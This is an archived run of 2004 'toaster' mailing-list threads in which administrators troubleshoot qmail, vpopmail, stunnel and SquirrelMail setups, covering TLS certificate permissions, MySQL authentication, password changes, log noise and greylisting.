time and for a great setup Bill. > > > > > > You're welcome. > > Regards, > > Bill >
[toaster] Latest toaster
Hi all, Noticed that the toaster has been updated to 0.7 stable - fantastic, great job bill, I'm going to be upgrading ASAP... ...but I have a couple of questions about the new toaster I hope someone wouldn't mind answering: - how can I configure the toaster with vpopmail mysql backend for users (just the users, keeping the preferences - .qmail files etc - as normal) I am aware of the tools to convert from flat-file to mysql and vice-versa, but I have thus far failed in converting a .6 toaster install to use mysql... - the default simscan config in the toaster is to use spam filtering - can I use this with dspam (which I have working with a .6 toaster) without conflicts/problems ? - If I re-install from toaster .6, is there anything special I have to do to keep my ~vpopmail/domains folder and make it work with .7 ? I appologise if the last question has been asked before, I haven't searched *that much* for the answer yet... mainly interested in the first two. Thanks everyone for your time and for a great setup Bill.
RE: [toaster] Qmail - TLS help
Bingo. Thanks so much. I was following the instructions here: http://qmailrocks.org/qmail.htm which, otherwise, are excellent. > Duh, I forgot that clientcert.pem is used by *qmail-remote*, not qmail-smtpd. qmail-remote can't make a TLS connection to a remote server that support STARTTLS because it can't read its client certificate. Try this (after re-creating your deleted certs): chown vpopmail:qmail /var/qmail/control/servercert.pem. This way, qmail-remote can read it too. This is exactly what my toaster patch set does at the end of "make cert". Regards, Bill <>
Re: [toaster] Qmail - TLS help
Now THAT makes sense! Thanks! __ david pollack acxiom corporation m:917.337.0471 w:212.204.1961 __ -Original Message- From: Bill Shupp <[EMAIL PROTECTED]> To: toaster@shupp.org Sent: Sun Dec 26 22:18:34 2004 Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: >Yes it does. > >One respondent from the qmr list suggested I delete both pem files from >/var/qmail/control. > >After doing that, the error has gone away. Its an ugly answer, but it >worked. > > > Duh, I forgot that clientcert.pem is used by *qmail-remote*, not qmail-smtpd. qmail-remote can't make a TLS connection to a remote server that support STARTTLS because it can't read its client certificate. Try this (after re-creating your deleted certs): chown vpopmail:qmail /var/qmail/control/servercert.pem. This way, qmail-remote can read it too. This is exactly what my toaster patch set does at the end of "make cert". Regards, Bill
Re: [toaster] Qmail - TLS help
Yes it does. One respondent from the qmr list suggested I delete both pem files from /var/qmail/control. After doing that, the error has gone away. Its an ugly answer, but it worked. Thanks for any more insight, David __ david pollack acxiom corporation m:917.337.0471 w:212.204.1961 __ -Original Message- From: Bill Shupp <[EMAIL PROTECTED]> To: toaster@shupp.org Sent: Sun Dec 26 21:45:23 2004 Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: > Heres the full message. Sorry for the duplication > >I've got a qmailrocks install, on RH enterprise 3.0. > > First off, this is not the qmailrocks mailing list.. and I'm not sure sure how that install does things (you'd probably have better luck on that list). However, if qmail-smtpd can't read the clientcert.pem which is clearly there, then it probably does not have permissions. Does qmail-smtpd run as vpopmail:vchkpw, which is how your clientcert.pem is owned? Regards, Bill
RE: [toaster] Qmail - TLS help
Heres the full message. Sorry for the duplication I've got a qmailrocks install, on RH enterprise 3.0. Im getting the following error when mail is sent to ONE domain: "TLS found no client cert in control/clientcert.pem I'm not going to try again; this message has been in the queue too long." Here's an ls -l /var/qmail/control: [EMAIL PROTECTED] control]# ls -l lrwxrwxrwx1 vpopmail vchkpw 33 Dec 21 12:02 clientcert.pem -> /var/qmail/control/servercert.pem -rw-r--r--1 root root3 Dec 21 12:10 concurrencyincoming -rw-r--r--1 root root4 Dec 21 12:10 concurrencyremote -rw-r--r--1 root root 10 Dec 21 12:10 defaultdelivery -rw-r--r--1 root root 13 Dec 21 12:01 defaultdomain -rw-r--r--1 root root 13 Dec 21 12:52 doublebounceto -rw-r--r--1 root root 22 Dec 21 12:01 locals -rw-r--r--1 root root 22 Dec 21 12:01 me -rw-r--r--1 root root 13 Dec 21 12:01 plusdomain -rw-r--r--1 root root6 Dec 21 12:52 queuelifetime -rw-r--r--1 root root 22 Dec 21 12:01 rcpthosts -rw-r-1 vpopmail vchkpw 2168 Dec 21 12:02 servercert.pem -rw-r--r--1 root root2 Dec 26 11:47 smtpforcetls -rw-r--r--1 root root4 Dec 21 12:51 timeoutremote -rw-r--r--1 root root4 Dec 21 12:51 timeoutsmtpd Any help would be greatly appreciated. thanks __ -Original Message- From: Bill Shupp [mailto:[EMAIL PROTECTED] Sent: Sunday, December 26, 2004 6:26 PM To: toaster@shupp.org Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: >I've set up a couple SMTP gateways using the instructions on >http://qmailrocks.org. > >I did NOT install vpopmail or the associated tools, as these servers >are used for smtp only & are not hosting any mailboxes. > >I'm getting the following error when mail is sent to ONE domain thru >these >servers: > >"TLS found no client cert in control/clientcert.pem I'm not going to >try again; this message has been in the queue too long." > >Here is an ls of /var/qmail/control: > > Well, if control if empty, that could be the problem. ;) sounds like you did not run "make cert". Bill
RE: [toaster] Qmail - TLS help
Please see my second submission. I DID run the make cert & the perms look right -Original Message- From: Bill Shupp [mailto:[EMAIL PROTECTED] Sent: Sunday, December 26, 2004 6:26 PM To: toaster@shupp.org Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: >I've set up a couple SMTP gateways using the instructions on >http://qmailrocks.org. > >I did NOT install vpopmail or the associated tools, as these servers >are used for smtp only & are not hosting any mailboxes. > >I'm getting the following error when mail is sent to ONE domain thru >these >servers: > >"TLS found no client cert in control/clientcert.pem I'm not going to >try again; this message has been in the queue too long." > >Here is an ls of /var/qmail/control: > > Well, if control if empty, that could be the problem. ;) sounds like you did not run "make cert". Bill
[toaster] Qmail-tls help
Title: Qmail-tls help Heres the full message. Sorry for the duplication I've got a qmailrocks install, on RH enterprise 3.0. Im getting the following error when mail is sent to ONE domain: "TLS found no client cert in control/clientcert.pem I'm not going to try again; this message has been in the queue too long." Here's an ls -l /var/qmail/control: [EMAIL PROTECTED] control]# ls -l lrwxrwxrwx 1 vpopmail vchkpw 33 Dec 21 12:02 clientcert.pem -> /var/qmail/control/servercert.pem -rw-r--r-- 1 root root 3 Dec 21 12:10 concurrencyincoming -rw-r--r-- 1 root root 4 Dec 21 12:10 concurrencyremote -rw-r--r-- 1 root root 10 Dec 21 12:10 defaultdelivery -rw-r--r-- 1 root root 13 Dec 21 12:01 defaultdomain -rw-r--r-- 1 root root 13 Dec 21 12:52 doublebounceto -rw-r--r-- 1 root root 22 Dec 21 12:01 locals -rw-r--r-- 1 root root 22 Dec 21 12:01 me -rw-r--r-- 1 root root 13 Dec 21 12:01 plusdomain -rw-r--r-- 1 root root 6 Dec 21 12:52 queuelifetime -rw-r--r-- 1 root root 22 Dec 21 12:01 rcpthosts -rw-r- 1 vpopmail vchkpw 2168 Dec 21 12:02 servercert.pem -rw-r--r-- 1 root root 2 Dec 26 11:47 smtpforcetls -rw-r--r-- 1 root root 4 Dec 21 12:51 timeoutremote -rw-r--r-- 1 root root 4 Dec 21 12:51 timeoutsmtpd Any help would be greatly appreciated. thanks __ [EMAIL PROTECTED] m:917.337.0471 w:212.204.1961 __
[toaster] Qmail - TLS help
I've set up a couple SMTP gateways using the instructions on http://qmailrocks.org. I did NOT install vpopmail or the associated tools, as these servers are used for smtp only & are not hosting any mailboxes. I'm getting the following error when mail is sent to ONE domain thru these servers: "TLS found no client cert in control/clientcert.pem I'm not going to try again; this message has been in the queue too long." Here is an ls of /var/qmail/control:
Re: [toaster] Changing Passwords
Yes, I have the right permissions and debug mode vconvert still shows up all OK... In the meantime to solve my password problem I have discovered that users can just log in to qmailadmin (as normal users not administrators) and receive a screen that just lets them change their user details - ie. password, vacation message etc. David. - Original Message - From: "Júlio Olivares" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, November 22, 2004 6:45 AM Subject: Re: [toaster] Changing Passwords > Are you sure that the mysql user/pass is correct and the user has the right > permissions ? > I think if you run vconvert with -d (debug) you will see the error. > > > But there are no tables in the vpopmail database. > > > > Is there something else I need to do or have I done something wrong? > > > > Thanks, > > > > David. > > > > > >
Re: [toaster] Changing Passwords
- Original Message - From: "Tom Collins" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, November 22, 2004 1:10 AM Subject: Re: [toaster] Changing Passwords > On Nov 21, 2004, at 5:18 AM, David wrote: > > Does anyone have any pointers for how to change the stock qmail toaster > > install (0.6) to use mysql authentication so that I can use one of > > these > > password plugins for squirrelmail? (btw I don't know which password > > plugin > > exactly to use) > > When configuring vpopmail, use --enable-auth-module=mysql. > > You'll need to create a vpopmail user and vpopmail table in your MySQL > database, assign the vpopmail user full access to the vpopmail table, > and then put that information in ~vpopmail/etc/vpopmail.mysql. > > To convert existing cdb domains to MySQL, use the vconvert program > that's a part of vpopmail. > > -- > Tom Collins - [EMAIL PROTECTED] > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ > Info on the Sniffter hand-held Network Tester: http://sniffter.com/ > > Thanks Tom - I created a vpopmail database & user, reconfigured, compiled & installed vpopmail and enabled mysql, edited the vpopmail.mysql file and re-configured, compiled & installed qmailadmin all successfully I then ran the vconvert utility as: vconvert -c -m and received an output like: converting mydomain.com ...done converting another-domain.com ...done converting another-domain.com.au ...done I then restarted all the qmail & vpopmail processes with qmailctl stop ; qmailctl start vpopmailctl stop ; vpopmailctl start qmailadmin still works - all my accounts & forwards etc. are still there. But there are no tables in the vpopmail database. Is there something else I need to do or have I done something wrong? Thanks, David.
Re: [toaster] Changing Passwords
Does anyone have any pointers for how to change the stock qmail toaster install (0.6) to use mysql authentication so that I can use one of these password plugins for squirrelmail? (btw I don't know which password plugin exactly to use) Thanks again, David. - Original Message - From: "Júlio Olivares" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, November 21, 2004 7:04 AM Subject: Re: [toaster] Changing Passwords > David, > > I think you can't change the passwords because you are using authvchkpw > module and since squirrelmail it's a php script it don't have permission to > do that. > If you compile your toaster with mysql authentication, you can pick a plugin > at squirrelmail.org to change the passwords. > > Regards, > Julio > > > > > > - Original Message - > From: "David" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Saturday, November 20, 2004 8:00 PM > Subject: Re: [toaster] Changing Passwords > > > > Thanks Júlio - > > > > I have version 0.6 of the toaster installed and it uses squirrelmail > instead > > of sqwebmail, which uses a perl-driven text menu for configuration - is > > there an equivalent option to --enable-changepass I can use for > squirrelmail > > ? > > > > Thanks again, > > David. > > > > - Original Message - > > From: "Júlio Manuel Olivares" <[EMAIL PROTECTED]> > > To: <[EMAIL PROTECTED]> > > Sent: Sunday, November 21, 2004 6:11 AM > > Subject: Re: [toaster] Changing Passwords > > > > > > > Are you using mysql ? If so you can do it with a php or perl script, > > > otherwise you will need qmailadmin, or sqwebmail compiled > > > with --enable-changepass. > > > > > > > > > > > > - Original Message - > > > From: "David" <[EMAIL PROTECTED]> > > > To: "Qmail Toaster" <[EMAIL PROTECTED]> > > > Sent: Saturday, November 20, 2004 7:28 PM > > > Subject: [toaster] Changing Passwords > > > > > > > > > > Hi all, > > > > > > > > I have the toaster installed and working successfully, but have a > > question > > > > about changing passwords - how can I enable my useres to change their > > > > passwords themselves? Do I have to give them access to qmailadmin? > > > > > > > > David. > > > > > > > > > > > > > > > > > > > >
Re: [toaster] Changing Passwords
Thanks Júlio - I have version 0.6 of the toaster installed and it uses squirrelmail instead of sqwebmail, which uses a perl-driven text menu for configuration - is there an equivalent option to --enable-changepass I can use for squirrelmail ? Thanks again, David. - Original Message - From: "Júlio Manuel Olivares" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, November 21, 2004 6:11 AM Subject: Re: [toaster] Changing Passwords > Are you using mysql ? If so you can do it with a php or perl script, > otherwise you will need qmailadmin, or sqwebmail compiled > with --enable-changepass. > > > > - Original Message - > From: "David" <[EMAIL PROTECTED]> > To: "Qmail Toaster" <[EMAIL PROTECTED]> > Sent: Saturday, November 20, 2004 7:28 PM > Subject: [toaster] Changing Passwords > > > > Hi all, > > > > I have the toaster installed and working successfully, but have a question > > about changing passwords - how can I enable my useres to change their > > passwords themselves? Do I have to give them access to qmailadmin? > > > > David. > > > > > >
[toaster] Changing Passwords
Hi all, I have the toaster installed and working successfully, but have a question about changing passwords - how can I enable my useres to change their passwords themselves? Do I have to give them access to qmailadmin? David.
[toaster] Attachment trouble
Hi All, I have Bill's fantastic qmail toaster installed on a RedHat 9 box and have had no trouble with it at all. However I have run into a problem recently with an e-mail sent from an external domain which runs an exchange server being rejected with the message: The recipient name is not recognized The MTS-ID of the original message is: c=US;a= ;p=Parex Industries;l=MAXWELL-041018225319Z-25226 Which I think is an Exchange error... however this only occurs when sending e-mails with attachments of 2-4 MB (and I haven't set any attachment size limits, it's just a standard toaster install). Can anybody offer any suggestions? Thankyou, David.
Re: [toaster] Logs flooding
Thanks Bill,
I modified the logwatch script in /etc/log.d/scripts/services/vpopmail to
give a count of successful login attempts instead of a line about each one:
near the beginning (under "# We don't care about these"):
} elsif (($ThisLine =~ /login success/)) {
$LoginSuccess++;
and at the end of the file:
if ($LoginSuccess) {
print "\nSuccessful logins: ". $LoginSuccess."\n";
}
Pretty amateurish (I don't know perl) but it gives me a count of successful
logins now - somewhere over 10,000 - which is much better, and I get to keep
the verbose logging for vpopmail (which I like) on.
David.
On Mon, 11 Oct 2004 11:59:30 -0700, Bill Shupp wrote
> David wrote:
>
> > Hi all,
> >
> > I have Bill's toaster installed and working correctly on a RedHat 9
> > install that is hosting a few e-mail domains (thanks Bill!). However
> > my logwatch logs are being flooded with thousands of entries in the
> > format:
> >
> > "vchkpw-pop3: (PLAIN) login success "
> >
>
> You can turn off logging in vpopmail if you want. Just remove the
> "--enable-logging=v" from your compilation line, and I believe it
> will default to --enable-logging=e.
>
> > under the heading "**Unmatched Entries**" in the vpopmail section.
> > Does anybody know how these get here, and especially why they're
> > appearing as _unmatched_ entries? My logwatch takes forever to process
> > on my mail client - it's currently sending around a 1 megabyte e-mail
> > each day.
> >
>
> That's either in syslog configuration, or logwatch configuration.
> I'm not sure which. I'd recommend tweaking this rather than turning
> off verbose logging. Those logs can be pretty useful, IMO.
>
> Regards,
>
> Bill
--
David Branford (www.davidbranford.net)
[toaster] Logs flooding
Hi all, I have Bill's toaster installed and working correctly on a RedHat 9 install that is hosting a few e-mail domains (thanks Bill!). However my logwatch logs are being flooded with thousands of entries in the format: "vchkpw-pop3: (PLAIN) login success " under the heading "**Unmatched Entries**" in the vpopmail section. Does anybody know how these get here, and especially why they're appearing as _unmatched_ entries? My logwatch takes forever to process on my mail client - it's currently sending around a 1 megabyte e-mail each day. Thanks again, David.
Re: [toaster] stunnel and redhat enterprise 3.0
On Wed, 2004-09-29 at 20:04, Jason 'XenoPhage' Frisvold wrote: > Hi all, > > I just determined that pop3ds is not working at all here... > Apparently the script calls several parameters for stunnel that are no > longer available in stunnel? I have the stock pop3ds run file from the > toaster which assumes stunnel 3.x ... I'm running stunnel 4.x ... > > Anyone know how to set this up for stunnel 4.x ?? > I think stunnel changed from using arguments on command line to a configuration file. This is my qmail-pop3ds supervise run script: #!/bin/sh VPOPMAILUID=`id -u vpopmail` VPOPMAILGID=`id -g vpopmail` exec envdir /etc/relay-ctrl \ /usr/bin/relay-ctrl-chdir \ /usr/local/bin/tcpserver -l 0 -R -H -v \ -u"$VPOPMAILUID" -g"$VPOPMAILGID" 0 995\ /usr/sbin/stunnel /etc/stunnel/qmail.conf 2>&1 And this is the /etc/stunnel/qmail.conf file: cat /etc/stunnel/qmail.conf # Sample qmail-pop3d with relay-ctrl config file # Paul Foremski ( pavcio(at)users.sf.net ) #cert = /usr/local/etc/stunnel/stunnel.pem cert = /etc/stunnel/pop3d.pem debug = 7 #output = /var/log/stunnel.log # client = no foreground = yes exec = /var/qmail/bin/qmail-popup execargs = qmail-popup alien77.com /Appz2/VPopMail/bin/vchkpw /usr/bin/relay-ctrl-allow /var/qmail/bin/qmail-pop3d Maildir Hope that helps.
RE: [toaster] spam problem
Hi, I think you may use chkusr patch instead, that's the one you'll find in shupp's guide. That way emails with invalid recipients are stopped at smtp level. Just be sure you chose the right version, cdb or mysql. HTH On Thu, 2004-09-16 at 10:17, Lucas Valdeón Villa wrote: > Hi, > > What I suffer is a 'dictionnary-generated' attack. > Problem is the same described in: > http://marc.theaimsgroup.com/?t=10950893654&r=1&w=2 > > One solution proposed in the qmail mailing list is this patch: > http://netdevice.com/qmail/patch/goodrcptto-12.patch > > I think this patch is not in netqmail neither shupp patches, isn´t it? > > Thank you, > Lucas > > > > -Mensaje original- > De: Rene [mailto:[EMAIL PROTECTED] > Enviado el: jue 16/09/2004 7:38 > Para: [EMAIL PROTECTED] > CC: > Asunto: Re: [toaster] spam problem > > > >
[toaster] SMTP-AUTH
Can anyone explain how SMTP-AUTH works in conjunction with the toaster? It have SMTP-AUTH working on other servers just fine so I am familiar with the over concepts. The part that I don't get relative to the toaster is where/how is user authentication handled? When I give it the same access info that works to retrieve mail ([EMAIL PROTECTED] plus password) SMTP-AUTH fails to authenticate. Does the access database need to be setup separately or is it supported to pull that data from vpopmail? TIA David Shirley http://www.webquarry.com
[toaster] addressbook in squirrelmail
Does anyone know where squirrelmail stores it's address books in this implementation of the toaster? TIA David Shirley http://www.webquarry.com
[toaster] Interesting story about greylisting with the toaster
I deployed a new toaster the other day and added the greylisting feature since the users on the old toaster were getting fed up with the heavy volume of spam that they were getting. The install went great and we moved all the user accounts to the new machine without incident. The really screwy thing is that immediately after it went into service, we started getting swamped with calls from users that were paniced because they didn't see a steady stream of junk coming into their mailboxes! They figured that email HAD to be broken. Even when we explained what was happening, they still couldn't accept it. We suggested that they test it out be sending emails to themselves from outside accounts like yahoo, etc. Naturally, they received those messages after the one-time greylist delay exactly as we told them would happen. It didn't matter. They were still convinced that something wasn't right since they didn't see the previous volume of junk mail! It was so strange having to assure people that the absence of junk mail was a GOOD thing and having them doubt us on it. Even though so far no user has been able to produce a test that fails to be delivered, the general consensus of the users that we have talked to is extreme skepticism. They seem to feel that NOTHING could or should work that well without causing at least some form of problem for them. Needless to say, this is not the reaction that we were expecting. To one user's credit, I have to report that although he screamed the loudest and made a HUGE fuss, once he saw how well it worked he placed an overseas call all the way from Australia and spent about ten minutes apologizing to any and every one that was available to talk to him. It sort of made dealing with all the other numskulls worthwhile... Anyone else have a similar experience? David Shirley
Re: [toaster] moving domains to another toaster (answering my own question...)
Userid #'s in /var/qmail/users/assign were wrong. A quick: sed "s/old#:old#/new#:new#/g" assign > assign.new fixed it right up. On Thursday, July 29, 2004, at 03:13 PM, David M. Shirley wrote: Hello I am in the process of moving some domains from one toaster box to another (the second one adds things like chkusr, greylisting and such) and I have copied /home/vpopmail/domains, /var/qmail/control and /var/qmail/users but my users cannot log in nor does mail get delivered. What else am I missing? David Shirley David Shirley http://www.webquarry.com
